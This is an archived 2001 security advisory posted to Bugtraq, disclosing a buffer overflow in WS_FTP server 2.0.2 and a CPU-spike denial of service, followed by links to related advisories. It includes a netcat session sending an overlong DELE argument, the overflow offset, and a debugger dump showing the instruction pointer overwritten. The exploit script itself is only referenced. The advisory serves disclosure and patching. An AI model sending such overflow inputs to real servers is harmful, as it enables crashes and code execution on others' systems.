def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS

From: andreas junestam (andreas.junestam@defcom.com)
Date: 07/26/01


Message-ID: <3B600C29.DADDFC63@defcom.com>
Date: Thu, 26 Jul 2001 13:25:13 +0100
From: andreas junestam <andreas.junestam@defcom.com>
To: bugtraq@securityfocus.com
Subject: def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS



======================================================================
                  Defcom Labs Advisory def-2001-28

         WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.

The server also contains a easy-to-trigger DOS.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  All the above mentioned commands seems to be using the same parsing
  code which suffers from a buffer overflow. By sending a command with
  an argument greater than 478 (474 bytes + new return address) bytes,
  a buffer will overflow and the EIP will be overwritten. A
  proof-of-concept exploit is attached to the advisory, which works
  against WS_FTP server 2.0.2 running on WIN2K (Professional and
  Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
  edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
  na po nc
  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
  efl=00010246

* Possible DOS
  By sending a couple of NULL(0x0) characters, the WS_FTP Server
  will spike at 100% CPU.

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.

======================================================================
            This release was brought to you by Defcom Labs

              labs@defcom.com www.defcom.com
======================================================================






Relevant Pages

  • [NT] WS_FTP Server Buffer Overflow and Possible DoS
    ... WS_FTP Server Buffer Overflow and Possible DoS ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... All the above-mentioned commands seem to be using the same parsing code ...
    (Securiteam)
  • RE: RPc server is unavailable since SP1
    ... After these commands run successfully, ... RPc server is unavailable since SP1 ... >> when the member server update certificate you get the error message RPC ... >> interface security settings before the installation of SP1 will be lost. ...
    (microsoft.public.windows.server.sbs)
  • Re: z/OSs basis for TCP/IP
    ... direction in the IP component of z/OS Communications Server is to get rid ... The Pascal socket interface uses the IUCV/VMCF services for a limited set ... TSO HOMETEST, LPQ, LPR, LPRM, LPRSET, TELNET, and TESTSITE commands ... - that the generically named TCPIP.DATA data set HOSTNAME ...
    (bit.listserv.ibm-main)
  • Re: z/OSs basis for TCP/IP
    ... Do TSO HELP SEND for syntax and usage. ... z/OS Systems Support ... "replaced" by the CSSMTP server. ... TSO HOMETEST, LPQ, LPR, LPRM, LPRSET, TELNET, and TESTSITE commands ...
    (bit.listserv.ibm-main)
  • [NT] NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)
    ... either be used as a small personal mail server or as a 10 Million user ISP ... password hash) when sending the administrative commands. ... the DList server using a numeric hash of the administrative password. ...
    (Securiteam)